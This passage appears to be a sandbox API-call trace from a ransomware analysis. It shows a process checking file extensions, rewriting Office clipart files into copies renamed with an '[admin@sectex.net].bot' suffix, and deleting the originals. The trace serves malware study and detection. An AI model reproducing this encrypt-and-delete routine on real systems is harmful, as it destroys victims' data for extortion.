	[0153.692] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099183.wmf")) returned 1
	[0153.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF") returned 63
	[0153.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF") returned 63
	[0153.693] lstrlenW (lpString=".doc") returned 4
	[0153.693] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.693] lstrlenW (lpString=".docx") returned 5
	[0153.693] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0153.693] lstrlenW (lpString=".pdf") returned 4
	[0153.693] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.693] lstrlenW (lpString=".xls") returned 4
	[0153.693] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.693] lstrlenW (lpString=".xlsx") returned 5
	[0153.693] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0153.693] lstrlenW (lpString=".ppt") returned 4
	[0153.693] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF") returned 63
	[0153.693] lstrlenW (lpString=".zip") returned 4
	[0153.693] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.693] lstrlenW (lpString=".rar") returned 4
	[0153.693] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.693] lstrlenW (lpString=".bz2") returned 4
	[0153.693] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.693] lstrlenW (lpString=".7z") returned 3
	[0153.693] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF") returned 63
	[0153.693] lstrlenW (lpString=".dbf") returned 4
	[0153.694] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF") returned 63
	[0153.694] lstrlenW (lpString=".1cd") returned 4
	[0153.694] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF") returned 63
	[0153.694] lstrlenW (lpString=".jpg") returned 4
	[0153.694] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF") returned 63
	[0153.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF") returned 63
	[0153.694] lstrlenW (lpString=".doc") returned 4
	[0153.694] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0153.694] lstrlenW (lpString=".docx") returned 5
	[0153.694] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1
	[0153.694] lstrlenW (lpString=".pdf") returned 4
	[0153.694] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0153.694] lstrlenW (lpString=".xls") returned 4
	[0153.694] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0153.694] lstrlenW (lpString=".xlsx") returned 5
	[0153.694] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1
	[0153.694] lstrlenW (lpString=".ppt") returned 4
	[0153.694] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0153.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF") returned 63
	[0153.694] lstrlenW (lpString=".zip") returned 4
	[0153.694] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0153.694] lstrlenW (lpString=".rar") returned 4
	[0153.694] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0153.694] lstrlenW (lpString=".bz2") returned 4
	[0153.694] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0153.694] lstrlenW (lpString=".7z") returned 3
	[0153.694] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0153.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF") returned 63
	[0153.695] lstrlenW (lpString=".dbf") returned 4
	[0153.695] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0153.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF") returned 63
	[0153.695] lstrlenW (lpString=".1cd") returned 4
	[0153.695] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0153.695] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF") returned 63
	[0153.695] lstrlenW (lpString=".jpg") returned 4
	[0153.695] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0153.695] lstrcmpiW (lpString1=".JPG", lpString2=".bot") returned 1
	[0153.695] lstrlenW (lpString="J0099188.JPG") returned 12
	[0153.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099188.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0153.695] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=9080) returned 1
	[0153.696] CloseHandle (hObject=0x3ac) returned 1
	[0153.696] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099188.jpg")) returned 0x20
	[0153.696] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099188.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099188.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0153.696] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.696] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099188.jpg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0153.697] GetLastError () returned 0x0
	[0153.697] ReadFile (in: hFile=0x3ac, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x2378, lpOverlapped=0x0) returned 1
	[0154.137] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x2380, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x2380, lpOverlapped=0x0) returned 1
	[0154.138] ReadFile (in: hFile=0x3ac, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.138] WriteFile (in: hFile=0x3f0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.138] SetEndOfFile (hFile=0x3f0) returned 1
	[0154.138] CloseHandle (hObject=0x3f0) returned 1
	[0154.138] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.138] SetEndOfFile (hFile=0x3ac) returned 1
	[0154.140] CloseHandle (hObject=0x3ac) returned 1
	[0154.140] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.141] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099188.jpg")) returned 1
	[0154.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG") returned 63
	[0154.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG") returned 63
	[0154.142] lstrlenW (lpString=".doc") returned 4
	[0154.142] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0154.142] lstrlenW (lpString=".docx") returned 5
	[0154.142] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0154.142] lstrlenW (lpString=".pdf") returned 4
	[0154.142] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0154.142] lstrlenW (lpString=".xls") returned 4
	[0154.142] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0154.142] lstrlenW (lpString=".xlsx") returned 5
	[0154.142] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0154.142] lstrlenW (lpString=".ppt") returned 4
	[0154.142] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0154.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG") returned 63
	[0154.142] lstrlenW (lpString=".zip") returned 4
	[0154.142] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0154.142] lstrlenW (lpString=".rar") returned 4
	[0154.142] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0154.142] lstrlenW (lpString=".bz2") returned 4
	[0154.142] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0154.142] lstrlenW (lpString=".7z") returned 3
	[0154.142] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0154.142] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG") returned 63
	[0154.142] lstrlenW (lpString=".dbf") returned 4
	[0154.142] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0154.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG") returned 63
	[0154.143] lstrlenW (lpString=".1cd") returned 4
	[0154.143] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0154.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG") returned 63
	[0154.143] lstrlenW (lpString=".jpg") returned 4
	[0154.143] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0154.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG") returned 63
	[0154.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG") returned 63
	[0154.143] lstrlenW (lpString=".doc") returned 4
	[0154.143] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1
	[0154.143] lstrlenW (lpString=".docx") returned 5
	[0154.143] lstrcmpiW (lpString1=".docx", lpString2="8.JPG") returned -1
	[0154.143] lstrlenW (lpString=".pdf") returned 4
	[0154.143] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1
	[0154.143] lstrlenW (lpString=".xls") returned 4
	[0154.143] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1
	[0154.143] lstrlenW (lpString=".xlsx") returned 5
	[0154.143] lstrcmpiW (lpString1=".xlsx", lpString2="8.JPG") returned -1
	[0154.143] lstrlenW (lpString=".ppt") returned 4
	[0154.143] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1
	[0154.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG") returned 63
	[0154.143] lstrlenW (lpString=".zip") returned 4
	[0154.143] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1
	[0154.143] lstrlenW (lpString=".rar") returned 4
	[0154.143] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1
	[0154.143] lstrlenW (lpString=".bz2") returned 4
	[0154.143] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1
	[0154.143] lstrlenW (lpString=".7z") returned 3
	[0154.143] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1
	[0154.143] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG") returned 63
	[0154.144] lstrlenW (lpString=".dbf") returned 4
	[0154.144] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1
	[0154.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG") returned 63
	[0154.144] lstrlenW (lpString=".1cd") returned 4
	[0154.144] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1
	[0154.144] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099188.JPG") returned 63
	[0154.144] lstrlenW (lpString=".jpg") returned 4
	[0154.144] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0
	[0154.144] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0154.144] lstrlenW (lpString="J0099197.GIF") returned 12
	[0154.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099197.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0154.222] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=10898) returned 1
	[0154.222] CloseHandle (hObject=0x268) returned 1
	[0154.222] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099197.gif")) returned 0x20
	[0154.279] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099197.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099197.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0154.280] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.280] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.280] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099197.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0154.281] GetLastError () returned 0x0
	[0154.281] ReadFile (in: hFile=0x3e0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x2a92, lpOverlapped=0x0) returned 1
	[0154.300] WriteFile (in: hFile=0x3e8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x2aa0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x2aa0, lpOverlapped=0x0) returned 1
	[0154.301] ReadFile (in: hFile=0x3e0, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.301] WriteFile (in: hFile=0x3e8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.301] SetEndOfFile (hFile=0x3e8) returned 1
	[0154.301] CloseHandle (hObject=0x3e8) returned 1
	[0154.301] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.301] SetEndOfFile (hFile=0x3e0) returned 1
	[0154.303] CloseHandle (hObject=0x3e0) returned 1
	[0154.303] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.304] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099197.gif")) returned 1
	[0154.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF") returned 63
	[0154.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF") returned 63
	[0154.304] lstrlenW (lpString=".doc") returned 4
	[0154.304] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.304] lstrlenW (lpString=".docx") returned 5
	[0154.304] lstrcmpiW (lpString1=".docx", lpString2="7.GIF") returned -1
	[0154.304] lstrlenW (lpString=".pdf") returned 4
	[0154.304] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.304] lstrlenW (lpString=".xls") returned 4
	[0154.304] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.304] lstrlenW (lpString=".xlsx") returned 5
	[0154.304] lstrcmpiW (lpString1=".xlsx", lpString2="7.GIF") returned -1
	[0154.304] lstrlenW (lpString=".ppt") returned 4
	[0154.304] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF") returned 63
	[0154.305] lstrlenW (lpString=".zip") returned 4
	[0154.305] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.305] lstrlenW (lpString=".rar") returned 4
	[0154.305] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.305] lstrlenW (lpString=".bz2") returned 4
	[0154.305] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.305] lstrlenW (lpString=".7z") returned 3
	[0154.305] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF") returned 63
	[0154.305] lstrlenW (lpString=".dbf") returned 4
	[0154.305] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF") returned 63
	[0154.305] lstrlenW (lpString=".1cd") returned 4
	[0154.305] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF") returned 63
	[0154.305] lstrlenW (lpString=".jpg") returned 4
	[0154.305] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF") returned 63
	[0154.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF") returned 63
	[0154.305] lstrlenW (lpString=".doc") returned 4
	[0154.305] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0154.305] lstrlenW (lpString=".docx") returned 5
	[0154.305] lstrcmpiW (lpString1=".docx", lpString2="7.GIF") returned -1
	[0154.305] lstrlenW (lpString=".pdf") returned 4
	[0154.305] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0154.305] lstrlenW (lpString=".xls") returned 4
	[0154.305] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0154.305] lstrlenW (lpString=".xlsx") returned 5
	[0154.305] lstrcmpiW (lpString1=".xlsx", lpString2="7.GIF") returned -1
	[0154.305] lstrlenW (lpString=".ppt") returned 4
	[0154.306] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0154.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF") returned 63
	[0154.306] lstrlenW (lpString=".zip") returned 4
	[0154.306] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0154.306] lstrlenW (lpString=".rar") returned 4
	[0154.306] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0154.306] lstrlenW (lpString=".bz2") returned 4
	[0154.306] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0154.306] lstrlenW (lpString=".7z") returned 3
	[0154.306] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0154.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF") returned 63
	[0154.306] lstrlenW (lpString=".dbf") returned 4
	[0154.306] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0154.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF") returned 63
	[0154.306] lstrlenW (lpString=".1cd") returned 4
	[0154.306] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0154.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099197.GIF") returned 63
	[0154.306] lstrlenW (lpString=".jpg") returned 4
	[0154.306] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0154.306] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0154.306] lstrlenW (lpString="J0099201.GIF") returned 12
	[0154.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099201.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0154.312] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=51401) returned 1
	[0154.312] CloseHandle (hObject=0x31c) returned 1
	[0154.312] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099201.gif")) returned 0x20
	[0154.315] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099201.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0154.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099201.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0154.315] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.315] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099201.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0154.316] GetLastError () returned 0x0
	[0154.316] ReadFile (in: hFile=0x39c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xc8c9, lpOverlapped=0x0) returned 1
	[0154.319] WriteFile (in: hFile=0x3e0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xc8d0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xc8d0, lpOverlapped=0x0) returned 1
	[0154.320] ReadFile (in: hFile=0x39c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0154.320] WriteFile (in: hFile=0x3e0, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0154.320] SetEndOfFile (hFile=0x3e0) returned 1
	[0154.320] CloseHandle (hObject=0x3e0) returned 1
	[0154.320] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0154.320] SetEndOfFile (hFile=0x39c) returned 1
	[0154.325] CloseHandle (hObject=0x39c) returned 1
	[0154.325] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0154.325] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099201.gif")) returned 1
	[0154.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF") returned 63
	[0154.326] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099201.GIF") returned 63
	[0154.326] lstrlenW (lpString=".doc") returned 4
